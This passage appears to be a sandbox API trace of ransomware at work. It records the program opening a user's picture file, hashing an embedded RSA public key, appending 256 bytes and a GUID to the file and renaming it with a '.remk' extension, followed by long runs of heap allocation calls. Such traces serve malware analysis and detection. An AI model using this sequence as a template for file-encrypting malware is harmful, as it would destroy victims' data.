(HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185c10 [0235.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7a68 [0235.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185cc8 [0235.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185fa8 [0235.645] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8172da90, ftCreationTime.dwHighDateTime=0x1d5dd14, ftLastAccessTime.dwLowDateTime=0xda5655f0, ftLastAccessTime.dwHighDateTime=0x1d5d842, ftLastWriteTime.dwLowDateTime=0xda5655f0, ftLastWriteTime.dwHighDateTime=0x1d5d842, nFileSizeHigh=0x0, nFileSizeLow=0x117f9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QAq-Frb.bmp", cAlternateFileName="")) returned 1 [0235.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6570 [0235.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xee) returned 0x31a4298 [0235.645] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\QAq-Frb.bmp") returned=".bmp" [0235.645] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\QAq-Frb.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\qaq-frb.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.646] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=71673) returned 1 [0235.646] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.649] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x117d3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.649] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.651] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x117f9, lpOverlapped=0x0) returned 1 [0235.651] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.652] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.652] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.652] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694e38) returned 1 [0235.653] CryptCreateHash (in: hProv=0x694e38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.653] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.653] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.653] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.653] GetLastError () returned 0x0 [0235.653] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.653] CryptReleaseContext (hProv=0x694e38, dwFlags=0x0) returned 1 [0235.653] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.653] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.653] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.654] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0235.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.654] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x117f9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.655] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.655] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.655] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.655] CloseHandle (hObject=0x640) returned 1 [0235.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185ef0 [0235.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x37bd408 [0235.657] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\QAq-Frb.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\qaq-frb.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\QAq-Frb.bmp.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\qaq-frb.bmp.remk")) returned 1 [0235.658] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8172da90, ftCreationTime.dwHighDateTime=0x1d5dd14, ftLastAccessTime.dwLowDateTime=0xda5655f0, ftLastAccessTime.dwHighDateTime=0x1d5d842, ftLastWriteTime.dwLowDateTime=0xda5655f0, ftLastWriteTime.dwHighDateTime=0x1d5d842, nFileSizeHigh=0x0, nFileSizeLow=0x117f9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QAq-Frb.bmp", cAlternateFileName="")) returned 0 [0235.658] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0235.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0235.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6768 | out: hHeap=0x630000) returned 1 [0235.658] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0235.658] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694e38 [0235.658] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0235.658] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.658] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.659] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.659] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.659] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.659] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.659] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.659] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.659] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.659] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.659] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.659] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.659] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.659] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.659] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.659] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.659] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.659] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.659] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.659] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.659] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.659] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.659] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.659] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.659] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0235.659] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.659] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.660] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.660] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.660] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.660] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.660] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.660] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.660] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.660] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.660] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.660] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.660] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.660] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.660] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.660] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.660] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.660] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.660] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.660] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.660] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.660] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.660] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.660] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.660] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.660] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.660] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.660] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.661] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.661] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.661] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.661] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.661] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.661] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.661] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.661] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.661] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.661] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.661] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.661] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.661] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.661] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.661] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.661] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.661] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.661] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.661] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.661] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.661] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.661] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.661] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.661] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.661] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0235.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 